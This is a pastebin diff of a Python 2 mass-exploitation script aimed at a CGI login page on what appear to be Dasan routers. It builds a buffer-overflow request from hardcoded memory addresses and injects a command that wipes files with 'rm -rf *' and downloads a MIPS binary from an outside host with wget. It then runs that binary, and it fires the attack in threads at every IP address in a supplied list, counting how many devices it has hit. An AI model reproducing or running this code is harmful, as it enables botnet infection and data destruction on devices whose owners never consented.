View difference between Paste ID: <a href="/S2fgH6vH">S2fgH6vH</a> and <a href="/etQsxZep">etQsxZep</a>

#!/usr/bin/python
1		#!/usr/bin/python
2
3		#zonehax is big 0 day exploiter 10/10
4		import sys, socket, json, time, ssl, struct, os
5		from threading import Thread
6		if len(sys.argv) < 2:
7		print "Usage: python "+sys.argv[0]+" <list>"
8		sys.exit()
9		port = 8080
10		buf = 4096
11		pre_pl0 = 0x2ad0c000
12		pre_pl2 = pre_pl0 + 0x00115d40
13		pl2 = struct.pack(">i",pre_pl2)
14		pre_pl3 = pre_pl0 + 0x0003CC9C
15		pl3 = struct.pack(">i",pre_pl3)
16
17		payload = "rm -rf *; wget http://1.1.1.1/bins/wicked.mips; chmod 777 wicked.mips; ./wicked.mips exploit.dasan"
18		payload2 = "rm -rf *; wget http://1.1.1.1/bins/wicked.mips; chmod 777 wicked.mips; ./wicked.mips exploit.dasan"
19		payload3 = "rm -rf *; wget http://1.1.1.1/bins/wicked.mips; chmod 777 wicked.mips; ./wicked.mips exploit.dasan"
20		payload4 = "rm -rf *; wget http://1.1.1.1/bins/wicked.mips; chmod 777 wicked.mips; ./wicked.mips exploit.dasan"
21		pre_data = "A"(756 - 0x28) + pl3 + 'C'(0x28-8) + pl2 + ';'*24 + payload
22		pre_data2 = "A"(756 - 0x28) + pl3 + 'C'(0x28-8) + pl2 + ';'*24 + payload2
23		pre_data3 = "A"(756 - 0x28) + pl3 + 'C'(0x28-8) + pl2 + ';'*24 + payload3
24		pre_data4 = "A"(756 - 0x28) + pl3 + 'C'(0x28-8) + pl2 + ';'*24 + payload4
25		post_data = "action="+pre_data+"&txtUserId=a&button=Login&txtPassword=a&sle_Language=english\r\n"
26		post_data2 = "action="+pre_data2+"&txtUserId=a&button=Login&txtPassword=a&sle_Language=english\r\n"
27		post_data3 = "action="+pre_data3+"&txtUserId=a&button=Login&txtPassword=a&sle_Language=english\r\n"
28		post_data4 = "action="+pre_data4+"&txtUserId=a&button=Login&txtPassword=a&sle_Language=english\r\n"
29		headers = "POST /cgi-bin/login_action.cgi HTTP/1.1\r\nHost: 192.168.1.100:8080\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: https://192.168.1.100:8080/cgi-bin/login.cgi\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: "+str(len(post_data))+"\r\n\r\n"+str(post_data)
30		headers2 = "POST /cgi-bin/login_action.cgi HTTP/1.1\r\nHost: 192.168.1.100:8080\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: https://192.168.1.100:8080/cgi-bin/login.cgi\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: "+str(len(post_data2))+"\r\n\r\n"+str(post_data2)
31		headers3 = "POST /cgi-bin/login_action.cgi HTTP/1.1\r\nHost: 192.168.1.100:8080\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: https://192.168.1.100:8080/cgi-bin/login.cgi\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: "+str(len(post_data3))+"\r\n\r\n"+str(post_data3)
32		headers4 = "POST /cgi-bin/login_action.cgi HTTP/1.1\r\nHost: 192.168.1.100:8080\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: https://192.168.1.100:8080/cgi-bin/login.cgi\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: "+str(len(post_data4))+"\r\n\r\n"+str(post_data4)
33		i = 0
34		ips = open(sys.argv[1]).readlines()
35
36		def dasan(host):
37		global i
38		host = host.strip("\n")
39		try:
40		sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
41		s = ssl.wrap_socket(sock)
42		s.connect((host, port))
43		s.send(headers)
44		s.send(headers2)
45		s.send(headers3)
46		resp = s.recv(buf).strip()
47		if "200 OK" in resp:
48		i += 1
49		s.close()
50		except:
51		pass
52
53		def worker():
54		for ip in ips:
55		try:
56		ip = ip.strip("\r\n")
57		t = Thread(target=dasan, args=(ip,))
58		t.start()
59		time.sleep(0.01)
60		except:
61		pass
62		time.sleep(30)
63		sys.exit("Finished Scanning")
64		workerthrd = Thread(target=worker)
65		workerthrd.start()
66		print headers
67		while True:
68		try:
69		sent = i
70		sys.stdout.write("\r\033[33mPayload Sent To \033[92m[\033[93m"+str(i)+"\033[92m]\033[33m Devices\033[0m")
71		sys.stdout.flush()
72		time.sleep(1)
73		except KeyboardInterrupt:
74		sys.exit("Exiting On User Input")
75		except:
76		pass